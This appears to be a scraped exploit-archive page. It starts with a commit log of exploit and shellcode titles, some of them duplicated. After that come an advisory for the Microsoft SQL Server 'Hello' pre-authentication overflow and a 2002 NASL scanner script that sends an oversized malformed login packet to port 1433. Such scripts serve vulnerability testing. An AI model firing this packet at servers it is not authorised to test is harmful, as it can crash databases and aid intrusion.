880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
108 lines
No EOL
3 KiB
Text
108 lines
No EOL
3 KiB
Text
source: https://www.securityfocus.com/bid/5411/info
|
|
|
|
A vulnerability has been discovered in Microsoft SQL Server that could make it possible for remote attackers to gain access to target hosts.
|
|
|
|
It is possible for an attacker to cause a buffer overflow condition on the vulnerable SQL server with a malformed login request. This may allow a remote attacker to execute arbitrary code as the SQL Server process.
|
|
|
|
This vulnerability reportedly occurs even before authentication can proceed.
|
|
|
|
##
|
|
#
|
|
# this script tests for the "You had me at hello" overflow
|
|
# in MSSQL (tcp/1433)
|
|
# Copyright Dave Aitel (2002)
|
|
# Bug found by: Dave Aitel (2002)
|
|
#
|
|
##
|
|
#TODO:
|
|
#techically we should also go to the UDP 1434 resolver service
|
|
#and get any additional ports!!!
|
|
|
|
|
|
if(description)
|
|
{
|
|
script_id(11067);
|
|
# script_cve_id("CVE-2000-0402");
|
|
script_version ("$Revision: 0.1 $");
|
|
name["english"] = "Microsoft SQL Server Hello Overflow";
|
|
script_name(english:name["english"]);
|
|
|
|
desc["english"] = "
|
|
The remote MS SQL server is vulnerable to the Hello overflow.
|
|
|
|
An attacker may use this flaw to execute commands against
|
|
the remote host as LOCAL/SYSTEM,
|
|
as well as read your database content.
|
|
|
|
Solution : disable this service (Microsoft SQL Server).
|
|
|
|
Risk factor : High";
|
|
|
|
script_description(english:desc["english"]);
|
|
|
|
summary["english"] = "Microsoft SQL Server Hello Overflow";
|
|
script_summary(english:summary["english"]);
|
|
|
|
script_category(ACT_ATTACK);
|
|
|
|
script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
|
|
family["english"] = "Windows";
|
|
script_family(english:family["english"]);
|
|
script_require_ports(1433);
|
|
exit(0);
|
|
}
|
|
|
|
#
|
|
# The script code starts here
|
|
#
|
|
#taken from mssql.spk
|
|
pkt_hdr = raw_string(
|
|
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
|
|
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03 ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
|
|
,0x10 ,0x00 ,0x00 ,0x00
|
|
);
|
|
|
|
#taken from mssql.spk
|
|
pkt_tail = raw_string (
|
|
0x00 ,0x24 ,0x01 ,0x00 ,0x00
|
|
);
|
|
|
|
#techically we should also go to the UDP 1434 resolver service
|
|
#and get any additional ports!!!
|
|
port = 1433;
|
|
found = 0;
|
|
report = "The SQL Server is vulnerable to the Hello overflow.
|
|
|
|
An attacker may use this flaw to execute commands against
|
|
the remote host as LOCAL/SYSTEM,
|
|
as well as read your database content.
|
|
|
|
Solution : disable this service (Microsoft SQL Server).
|
|
|
|
Risk factor : High";
|
|
|
|
|
|
if(get_port_state(port))
|
|
{
|
|
soc = open_sock_tcp(port);
|
|
|
|
if(soc)
|
|
{
|
|
#uncomment this to see what normally happens
|
|
#attack_string="MSSQLServer";
|
|
#uncomment next line to actually test for overflow
|
|
attack_string=crap(560);
|
|
# this creates a variable called sql_packet
|
|
sql_packet = pkt_hdr+attack_string+pkt_tail;
|
|
send(socket:soc, data:sql_packet);
|
|
|
|
r = recv(socket:soc, length:4096);
|
|
close(soc);
|
|
display ("Result:",r,"\n");
|
|
if(!r)
|
|
{
|
|
display("Security Hole in MSSQL\n");
|
|
security_hole(port:port, data:report);
|
|
}
|
|
}
|
|
} |